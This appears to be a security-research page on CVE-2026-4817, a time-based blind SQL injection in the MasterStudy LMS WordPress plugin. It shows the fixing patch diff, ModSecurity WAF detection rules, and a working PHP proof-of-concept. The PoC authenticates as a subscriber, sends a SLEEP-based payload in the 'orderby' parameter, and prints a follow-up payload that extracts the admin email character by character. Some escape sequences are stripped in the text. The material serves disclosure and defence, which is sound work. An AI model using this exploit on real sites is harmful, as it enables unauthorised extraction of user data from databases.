CVE-2026-4817: MasterStudy LMS <= 3.7.25 – Authenticated (Subscriber+) Time-based Blind SQL Injection via 'order' and 'orderby' Parameters (masterstudy-lms-learning-management-system)

--- a/masterstudy-lms-learning-management-system/_core/includes/user_manager/UserManager.Course.php
+++ b/masterstudy-lms-learning-management-system/_core/includes/user_manager/UserManager.Course.php
@@ -169,7 +169,7 @@
 				'course_title'    => $course_title,
 				'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'            => gmdate( 'Y-m-d H:i:s' ),
+				'date'            => current_time( 'mysql' ),
 			);

 			STM_LMS_Helpers::send_email(
--- a/masterstudy-lms-learning-management-system/_core/init.php
+++ b/masterstudy-lms-learning-management-system/_core/init.php
@@ -3,7 +3,7 @@
 define( 'STM_LMS_DIR', __DIR__ );
 define( 'STM_LMS_PATH', dirname( STM_LMS_FILE ) );
 define( 'STM_LMS_URL', plugin_dir_url( STM_LMS_FILE ) );
-define( 'STM_LMS_VERSION', '3.7.25' );
+define( 'STM_LMS_VERSION', '3.7.26' );
 define( 'STM_LMS_DB_VERSION', '3.7.5' );
 define( 'STM_LMS_BASE_API_URL', '/wp-json/lms' );
 define( 'STM_LMS_LIBRARY', STM_LMS_PATH . '/libraries' );
--- a/masterstudy-lms-learning-management-system/_core/libraries/nuxy/NUXY.php
+++ b/masterstudy-lms-learning-management-system/_core/libraries/nuxy/NUXY.php
@@ -3,7 +3,7 @@
  * Framework Name: NUXY
  * Framework URI: https://github.com/StylemixThemes/nuxy
  * Description: WordPress Custom Fields & Theme Options with Vue.js.
- * Version: 4.4.46
+ * Version: 4.4.47
  * License: http://www.gnu.org/licenses/gpl-3.0.html
  * Author: StylemixThemes
  * Author URI: https://stylemixthemes.com
@@ -24,7 +24,7 @@

 		if ( ! class_exists( 'Stylemix_NUXY' ) && __FILE__ === $max_version[0] ) {

-			define( 'STM_WPCFTO_VERSION', '4.4.46' );
+			define( 'STM_WPCFTO_VERSION', '4.4.47' );
 			define( 'STM_WPCFTO_FILE', __FILE__ );
 			define( 'STM_WPCFTO_PATH', dirname( STM_WPCFTO_FILE ) );
 			define( 'STM_WPCFTO_URL', plugin_dir_url( STM_WPCFTO_FILE ) );
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/comments.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/comments.php
@@ -173,7 +173,7 @@
 				'course_title'    => $course_title,
 				'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'            => gmdate( 'Y-m-d H:i:s' ),
+				'date'            => current_time( 'mysql' ),
 				'course_url'      => MS_LMS_Email_Template_Helpers::link( get_the_permalink( $course_id ) ),
 			);

--- a/masterstudy-lms-learning-management-system/_core/lms/classes/email_free_triggers.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/email_free_triggers.php
@@ -315,7 +315,7 @@
 			'site_url'               => class_exists( 'MS_LMS_Email_Template_Helpers' )
 				? MS_LMS_Email_Template_Helpers::link( home_url( '/' ) )
 				: home_url( '/' ),
-			'date'                   => gmdate( 'Y-m-d H:i:s' ),
+			'date'                   => current_time( 'mysql' ),
 		);

 		if ( class_exists( 'STM_LMS_Helpers' ) && method_exists( 'STM_LMS_Helpers', 'send_email' ) ) {
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/guest_checkout.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/guest_checkout.php
@@ -396,7 +396,7 @@
 			'blog_name'    => $blog_name,
 			'checkout_url' => MS_LMS_Email_Template_Helpers::link( $checkout_url ),
 			'site_url'     => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'         => gmdate( 'Y-m-d H:i:s' ),
+			'date'         => current_time( 'mysql' ),
 		);

 		$message = MS_LMS_Email_Template_Helpers::render( $template, $email_data );
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/instructors.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/instructors.php
@@ -72,7 +72,7 @@
 				'course_title'    => $course_title,
 				'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'            => gmdate( 'Y-m-d H:i:s' ),
+				'date'            => current_time( 'mysql' ),
 				'course_edit_url' => MS_LMS_Email_Template_Helpers::link( ms_plugin_manage_course_url( $post_id ) ),
 				'course_url'      => MS_LMS_Email_Template_Helpers::link( get_permalink( $post_id ) ),
 			);
@@ -865,7 +865,7 @@
 					$email_data = array(
 						'user_login' => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 						'user_id'    => $user_id,
-						'date'       => gmdate( 'Y-m-d H:i:s' ),
+						'date'       => current_time( 'mysql' ),
 					);

 					foreach ( $data['fields'] as $field ) {
@@ -950,7 +950,7 @@

 				$instructor_premoderation = STM_LMS_Options::get_option( 'instructor_premoderation', false );

-				$date       = wp_date( 'Y-m-d H:i:s' );
+				$date       = current_time( 'mysql' );
 				$user_email = $user['email'];

 				$message = esc_html__( 'You have received a new instructor application from ', 'masterstudy-lms-learning-management-system-pro' ) . $user_login . ', <br/>' . // phpcs:disable
@@ -1141,7 +1141,7 @@
 				'password'  => $password,
 				'site_url'  => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 				'blog_name' => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
-				'date'      => gmdate( 'Y-m-d H:i:s' ),
+				'date'      => current_time( 'mysql' ),
 				'login_url' => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_login_url() ),
 			);

@@ -1300,7 +1300,7 @@
 					'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 					'login_url'       => STM_LMS_Helpers::masterstudy_lms_get_login_url(),
 					'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-					'date'            => gmdate( 'Y-m-d H:i:s' ),
+					'date'            => current_time( 'mysql' ),
 					'admin_comment'   => $admin_message,
 				);

@@ -1331,7 +1331,7 @@
 					'user_login'    => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 					'blog_name'     => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 					'site_url'      => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-					'date'          => gmdate( 'Y-m-d H:i:s' ),
+					'date'          => current_time( 'mysql' ),
 					'admin_comment' => $admin_message,
 				);

--- a/masterstudy-lms-learning-management-system/_core/lms/classes/lesson.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/lesson.php
@@ -93,7 +93,7 @@
 			'course_url'   => get_permalink( $course_id ),
 			'course_title' => get_the_title( $course_id ),
 			'lesson_title' => get_the_title( $lesson_id ),
-			'date'         => gmdate( 'Y-m-d H:i:s' ),
+			'date'         => current_time( 'mysql' ),
 			'blog_name'    => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'     => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 		);
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/mails.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/mails.php
@@ -68,7 +68,7 @@
 			'blog_name'     => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'      => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 			'student_email' => STM_LMS_Helpers::masterstudy_lms_get_user_email_by_user_id( $user_id ),
-			'date'          => gmdate( 'Y-m-d H:i:s' ),
+			'date'          => current_time( 'mysql' ),
 		);

 		$template = $settings['stm_lms_new_order_instructor'] ?? 'You made a Sale';
@@ -109,7 +109,7 @@
 			'student_email' => STM_LMS_Helpers::masterstudy_lms_get_user_email_by_user_id( $user_id ),
 			'blog_name'     => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'      => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'          => gmdate( 'Y-m-d H:i:s' ),
+			'date'          => current_time( 'mysql' ),
 		);

 		$template = $settings['stm_lms_new_order'] ?? 'New Order';
@@ -154,7 +154,7 @@
 			'user_login' => $user_value,
 			'blog_name'  => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'   => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'       => gmdate( 'Y-m-d H:i:s' ),
+			'date'       => current_time( 'mysql' ),
 		);

 		$template = $settings['stm_lms_new_order_accepted'] ?? 'Your Order has been Accepted.';
@@ -288,7 +288,7 @@
 			'login'        => $login,
 			'blog_name'    => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'     => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'         => gmdate( 'Y-m-d H:i:s' ),
+			'date'         => current_time( 'mysql' ),
 			'course_url'   => MS_LMS_Email_Template_Helpers::link( get_permalink( $course_id ) ),
 			'user_login'   => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 		);
@@ -326,7 +326,7 @@
 		$email_data_enrollment = array(
 			'user_login'    => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 			'course_title'  => $course_title,
-			'date' => gmdate( 'Y-m-d H:i:s' ),
+			'date' => current_time( 'mysql' ),
 		);
 		$search                = array( '{{user_login}}', '{{course_title}}', '{{date}}' );
 		$replace               = array(
@@ -362,7 +362,7 @@
 			'course_title'    => $title,
 			'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'            => gmdate( 'Y-m-d H:i:s' ),
+			'date'            => current_time( 'mysql' ),
 			'dashboard_url'   => MS_LMS_Email_Template_Helpers::link( admin_url() ),
 			'course_edit_url' => MS_LMS_Email_Template_Helpers::link( ms_plugin_manage_course_url( $post_id ) ),
 			'course_url'      => MS_LMS_Email_Template_Helpers::link( get_permalink( $post_id ) ),
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/models/StmStatistics.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/models/StmStatistics.php
@@ -52,6 +52,18 @@
 		return $author_fee ? $author_fee : 10;
 	}

+	private static function normalize_order_direction( $order ) {
+		$order = strtoupper( trim( sanitize_text_field( (string) $order ) ) );
+
+		return in_array( $order, array( 'ASC', 'DESC' ), true ) ? $order : 'ASC';
+	}
+
+	private static function normalize_orderby( $orderby, $allowed_columns, $default_column ) {
+		$orderby = sanitize_key( (string) $orderby );
+
+		return $allowed_columns[ $orderby ] ?? $default_column;
+	}
+
 	/**
 	 * @param $offset
 	 * @param $limit
@@ -107,11 +119,14 @@
 			$query->where( 'course.`post_author`', (int) $params['post_author'] );
 		}

-		if ( ! empty( $params['orderby'] ) ) {
-			$query->sort_by( esc_sql( $params['orderby'] ) )->order( ! empty( $params['order'] ) ? ' ' . esc_sql( $params['order'] ) : ' ASC' );
-		} else {
-			$query->sort_by( 'ID' )->order( ' DESC ' );
-		}
+		$allowed_orderby = array(
+			'id'        => 'ID',
+			'post_date' => 'post_date',
+		);
+		$orderby         = self::normalize_orderby( $params['orderby'] ?? '', $allowed_orderby, 'ID' );
+		$order           = self::normalize_order_direction( $params['order'] ?? 'DESC' );
+
+		$query->sort_by( $orderby )->order( $order );

 		$query_total = clone $query;

@@ -198,11 +213,17 @@
 				->where_raw( ' (  meta_status.post_id = _order.ID OR order_status.ID = _order.ID )  ' );
 		}

-		if ( ! empty( $params['orderby'] ) ) {
-			$query->sort_by( esc_sql( $params['orderby'] ) )->order( ! empty( $params['order'] ) ? ' ' . esc_sql( $params['order'] ) : ' ASC' );
-		} else {
-			$query->sort_by( 'ID' )->order( ' DESC ' );
-		}
+		$allowed_orderby = array(
+			'id'           => 'id',
+			'date_created' => 'date_created',
+			'name'         => 'name',
+			'status'       => 'status',
+			'payment_code' => 'payment_code',
+		);
+		$orderby         = self::normalize_orderby( $params['orderby'] ?? '', $allowed_orderby, 'id' );
+		$order           = self::normalize_order_direction( $params['order'] ?? 'DESC' );
+
+		$query->sort_by( $orderby )->order( $order );

 		$query_total          = clone $query;
 		$user_orders['total'] = $query_total->select( ' COUNT(DISTINCT lms_order_items.id) as count ' )->findOne()->count ?? 0;
@@ -239,9 +260,13 @@

 		$params['completed'] = true;

-		if ( $params['author_id'] ) {
+		if ( ! empty( $params['author_id'] ) ) {
+			$params['author_id'] = (int) $params['author_id'];
+
 			return self::get_user_order_items( $offset, $limit, $params );
 		}
+
+		return array();
 	}

 	/**
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/models/admin/StmStatisticsListTable.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/models/admin/StmStatisticsListTable.php
@@ -127,14 +127,16 @@

 		$this->total_price = ( ! empty( $one ) ) ? $one->total_price : 0;

-		$request_order_by = $_REQUEST['orderby'] ?? null; // phpcs:ignore WordPress.Security.NonceVerification.Recommended
-		$request_order    = $_REQUEST['order'] ?? null; // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		$request_order_by = sanitize_key( $_REQUEST['orderby'] ?? '' ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		$request_order    = strtoupper( trim( sanitize_text_field( $_REQUEST['order'] ?? '' ) ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		$allowed_orderby  = array(
+			'id'        => 'ID',
+			'post_date' => 'post_date',
+		);
+		$order_by         = $allowed_orderby[ $request_order_by ] ?? 'ID';
+		$order            = in_array( $request_order, array( 'ASC', 'DESC' ), true ) ? $request_order : 'DESC';

-		if ( ! empty( $request_order_by ) ) {
-			$query->sort_by( esc_sql( $request_order_by ) )->order( ! empty( $request_order ) ? ' ' . esc_sql( $request_order ) : ' ASC' );
-		} else {
-			$query->sort_by( 'ID' )->order( ' DESC ' );
-		}
+		$query->sort_by( $order_by )->order( $order );

 		$query->join( ' left join ' . $prefix . 'postmeta as meta on (meta.post_id = _order.ID)' )
 			->group_by( '_order.ID' )
@@ -471,5 +473,3 @@
 	}

 }
-
-
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/quiz.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/quiz.php
@@ -181,7 +181,7 @@
 				'course_title'         => $course_title,
 				'quiz_result'          => $progress,
 				'quiz_passing_grade'   => $passing_grade,
-				'quiz_completion_date' => gmdate( 'Y-m-d H:i:s' ),
+				'quiz_completion_date' => current_time( 'mysql' ),
 				'blog_name'            => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'             => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 				'quiz_url'             => MS_LMS_Email_Template_Helpers::link( STM_LMS_Lesson::get_lesson_url( $course_id, $quiz_id ) ),
@@ -221,7 +221,7 @@
 				'quiz_name'            => $quiz_name,
 				'course_title'         => $course_title,
 				'quiz_result'          => $progress,
-				'quiz_completion_date' => gmdate( 'Y-m-d H:i:s' ),
+				'quiz_completion_date' => current_time( 'mysql' ),
 				'blog_name'            => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'             => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 				'quiz_url'             => MS_LMS_Email_Template_Helpers::link( STM_LMS_Lesson::get_lesson_url( $course_id, $quiz_id ) ),
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/subscriptions.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/subscriptions.php
@@ -191,7 +191,7 @@
 					'course_title'    => $course_title,
 					'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 					'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-					'date'            => gmdate( 'Y-m-d H:i:s' ),
+					'date'            => current_time( 'mysql' ),
 					'login'           => $login,
 					'user_login'      => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 					'course_url'      => MS_LMS_Email_Template_Helpers::link( get_permalink( $course_id ) ),
--- a/masterstudy-lms-learning-management-system/_core/lms/classes/user.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/user.php
@@ -559,7 +559,7 @@
 			'blog_name'  => $blog_name,
 			'reset_url'  => $reset_url,
 			'site_url'   => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'       => gmdate( 'Y-m-d H:i:s' ),
+			'date'       => current_time( 'mysql' ),
 		);

 		$message = MS_LMS_Email_Template_Helpers::render( $template, $email_data_account_premoderation );
@@ -673,7 +673,7 @@
 			'user_login' => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user ),
 			'login_url'  => $login_url,
 			'site_url'   => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'       => gmdate( 'Y-m-d H:i:s' ),
+			'date'       => current_time( 'mysql' ),
 			'user_id'    => $user,
 		);

@@ -720,7 +720,7 @@
 		$email_data = array(
 			'user_login'        => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user ),
 			'user_email'        => $user_email,
-			'registration_date' => gmdate( 'Y-m-d H:i:s' ),
+			'registration_date' => current_time( 'mysql' ),
 			'blog_name'         => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			'site_url'          => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 		);
@@ -1767,7 +1767,7 @@
 			$email_data = array(
 				'blog_name'  => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'   => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'       => gmdate( 'Y-m-d H:i:s' ),
+				'date'       => current_time( 'mysql' ),
 				'user_login' => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 			);

@@ -1960,7 +1960,7 @@
 			$message   = '';
 			$subject   = esc_html__( 'Enterprise Request', 'masterstudy-lms-learning-management-system' );
 			$user_data = array(
-				'date'      => date( 'Y-m-d H:i:s' ),
+				'date'      => current_time( 'mysql' ),
 				'site_url'  => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
 				'blog_name' => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 			);
@@ -2019,7 +2019,7 @@
 			$name    = $data['fields']['enterprise_name'];
 			$email   = $data['fields']['enterprise_email'];
 			$text    = $data['fields']['enterprise_text'];
-			$date    = gmdate( 'Y-m-d H:i:s' );
+			$date    = current_time( 'mysql' );
 			$subject = esc_html__( 'Enterprise Request', 'masterstudy-lms-learning-management-system' );

 			$message = esc_html__( 'You have received a new enterprise inquiry', 'masterstudy-lms-learning-management-system' ) . ' <br/>' . // phpcs:disable
@@ -2037,7 +2037,7 @@
 				'text'      => $text,
 				'blog_name' => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'  => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'      => gmdate( 'Y-m-d H:i:s' ),
+				'date'      => current_time( 'mysql' ),
 			);

 			STM_LMS_Helpers::send_email(
@@ -2128,7 +2128,7 @@
 			'reset_url'  => $reset_url,
 			'blog_name'  => $site_name,
 			'site_url'   => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-			'date'       => gmdate( 'Y-m-d H:i:s' ),
+			'date'       => current_time( 'mysql' ),
 		);

 		$message = MS_LMS_Email_Template_Helpers::render( $template, $email_data );
@@ -2458,7 +2458,7 @@
 			$email_data = array(
 				'blog_name'  => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'   => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'       => gmdate( 'Y-m-d H:i:s' ),
+				'date'       => current_time( 'mysql' ),
 				'user_login' => STM_LMS_Helpers::masterstudy_lms_get_user_full_name_or_login( $user_id ),
 			);

--- a/masterstudy-lms-learning-management-system/_core/lms/classes/vendor/Query.php
+++ b/masterstudy-lms-learning-management-system/_core/lms/classes/vendor/Query.php
@@ -1,4 +1,5 @@
 <?php
+// phpcs:ignoreFile

 namespace stmLmsClassesVendor;

@@ -214,12 +215,63 @@
      * @param  string $order
      * @return self
      */
-    public function order($order)
-    {
-        $this->order = $order;
+	public function order($order)
+	{
+		$this->order = $order;

-        return $this;
-    }
+		return $this;
+	}
+
+	private function sanitize_order_direction( $order ) {
+		$order = strtoupper( trim( (string) $order ) );
+
+		if ( in_array( $order, array( self::ORDER_ASCENDING, self::ORDER_DESCENDING ), true ) ) {
+			return $order;
+		}
+
+		return self::ORDER_ASCENDING;
+	}
+
+	private function sanitize_sort_by( $sort_by, $asTable_ = '' ) {
+		$sort_by = trim( (string) $sort_by );
+
+		if ( empty( $sort_by ) ) {
+			$sort_by = ! empty( $this->primary_key ) ? $this->primary_key : 'id';
+		}
+
+		$columns           = preg_split( '/s*,s*/', $sort_by );
+		$sanitized_columns = array();
+
+		foreach ( $columns as $column ) {
+			$column = trim( $column );
+
+			if ( empty( $column ) ) {
+				continue;
+			}
+
+			if ( ! preg_match( '/^[A-Za-z0-9_]+(?:.[A-Za-z0-9_]+)?$/', $column ) ) {
+				continue;
+			}
+
+			if ( strpos( $column, '.' ) === false && ! empty( $asTable_ ) ) {
+				$column = $asTable_ . $column;
+			}
+
+			$sanitized_columns[] = $column;
+		}
+
+		if ( empty( $sanitized_columns ) ) {
+			$fallback = ! empty( $this->primary_key ) ? $this->primary_key : 'id';
+
+			if ( strpos( $fallback, '.' ) === false && ! empty( $asTable_ ) ) {
+				$fallback = $asTable_ . $fallback;
+			}
+
+			$sanitized_columns[] = $fallback;
+		}
+
+		return implode( ', ', $sanitized_columns );
+	}

 	/**
 	 * @param $group_by string
@@ -669,13 +721,8 @@
 			$where = ' WHERE ' . substr($where, 5);
 		}

-		// Order
-		if (strstr($this->sort_by, '(') !== false && strstr($this->sort_by, ')') !== false) {
-			// The sort column contains () so we assume its a function, therefore
-			// don't quote it
-			$order = ' ORDER BY ' . $this->sort_by . ' ' . $this->order;
-		} else
-			$order = ' ORDER BY '.$asTable_. $this->sort_by . ' ' . $this->order;
+			// Order
+			$order = ' ORDER BY ' . $this->sanitize_sort_by( $this->sort_by, $asTable_ ) . ' ' . $this->sanitize_order_direction( $this->order );

 		if( !empty($this->group_by) )
 			$group_by = " GROUP BY ".$this->group_by;
@@ -708,4 +755,3 @@
 }


-
--- a/masterstudy-lms-learning-management-system/includes/Repositories/StudentsRepository.php
+++ b/masterstudy-lms-learning-management-system/includes/Repositories/StudentsRepository.php
@@ -443,7 +443,7 @@
 				'course_title'    => $course_title,
 				'blog_name'       => STM_LMS_Helpers::masterstudy_lms_get_site_name(),
 				'site_url'        => MS_LMS_Email_Template_Helpers::link( STM_LMS_Helpers::masterstudy_lms_get_site_url() ),
-				'date'            => gmdate( 'Y-m-d H:i:s' ),
+				'date'            => current_time( 'mysql' ),
 			);

 			STM_LMS_Helpers::send_email(
--- a/masterstudy-lms-learning-management-system/masterstudy-lms-learning-management-system.php
+++ b/masterstudy-lms-learning-management-system/masterstudy-lms-learning-management-system.php
@@ -7,7 +7,7 @@
  * Author: StylemixThemes
  * Author URI: https://stylemixthemes.com/
  * Text Domain: masterstudy-lms-learning-management-system
- * Version: 3.7.25
+ * Version: 3.7.26
  * Masterstudy LMS Pro tested up to: 4.8
  */

@@ -15,7 +15,7 @@
 	exit; // Exit if accessed directly
 }

-define( 'MS_LMS_VERSION', '3.7.25' );
+define( 'MS_LMS_VERSION', '3.7.26' );
 define( 'MS_LMS_FILE', __FILE__ );
 define( 'MS_LMS_PATH', dirname( MS_LMS_FILE ) );
 define( 'MS_LMS_URL', plugin_dir_url( MS_LMS_FILE ) );

# Atomic Edge WAF Rule - CVE-2026-4817
SecRule REQUEST_URI "@rx ^/wp-json/lms/stm-lms/order/items" 
  "id:20264817,phase:2,deny,status:403,chain,msg:'CVE-2026-4817: MasterStudy LMS SQL Injection via order/orderby parameters',severity:'CRITICAL',tag:'CVE-2026-4817',tag:'application-multi',tag:'language-php',tag:'platform-wordpress',tag:'attack-sqli',tag:'paranoia-level/1',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION'"
  SecRule ARGS:orderby "@rx (.*)" 
    "t:lowercase,t:urlDecodeUni,t:removeNulls,t:removeWhitespace,setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"

SecRule REQUEST_URI "@rx ^/wp-json/lms/stm-lms/order/items" 
  "id:20264818,phase:2,deny,status:403,chain,msg:'CVE-2026-4817: MasterStudy LMS SQL Injection via CASE WHEN payload',severity:'CRITICAL',tag:'CVE-2026-4817',tag:'application-multi',tag:'language-php',tag:'platform-wordpress',tag:'attack-sqli',tag:'paranoia-level/2',tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION'"
  SecRule ARGS:orderby|ARGS:order "@rx (?i)(case|when|sleep|benchmark|pg_sleep|waitfor)s*(.*)" 
    "t:lowercase,t:urlDecodeUni,t:removeNulls,t:removeWhitespace,setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4817 - MasterStudy LMS <= 3.7.25 - Authenticated (Subscriber+) Time-based Blind SQL Injection via 'order' and 'orderby' Parameters

<?php

$target_url = "https://vulnerable-site.com/wp-json/lms/stm-lms/order/items";
$username = "subscriber";
$password = "password";

// Step 1: Authenticate to get WordPress cookies
$login_url = "https://vulnerable-site.com/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'https://vulnerable-site.com/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Craft time-based SQL injection payload
// This payload tests if the first user's ID is 1 by causing a 5-second delay
$payload = "(CASE WHEN (SELECT SLEEP(5) FROM wp_users WHERE ID=1) THEN id ELSE post_date END)";

// Step 3: Send exploit request to vulnerable endpoint
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . "?orderby=" . urlencode($payload) . "&order=DESC");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Set timeout to detect delay

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);

$response_time = $end_time - $start_time;

// Step 4: Analyze response time to confirm vulnerability
if ($response_time >= 5) {
    echo "[+] Vulnerability confirmed! Response time: " . round($response_time, 2) . " secondsn";
    echo "[+] The database is vulnerable to time-based blind SQL injection.n";
    
    // Example of data extraction logic (extracting first character of admin email)
    echo "[+] Example payload to extract first character of admin email:n";
    echo "    orderby=(CASE WHEN (SUBSTRING((SELECT user_email FROM wp_users WHERE ID=1 LIMIT 1),1,1)='a') THEN SLEEP(5) ELSE id END)n";
} else {
    echo "[-] No time delay detected. Response time: " . round($response_time, 2) . " secondsn";
    echo "[-] Site may be patched or payload failed.n";
}

// Clean up
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}

?>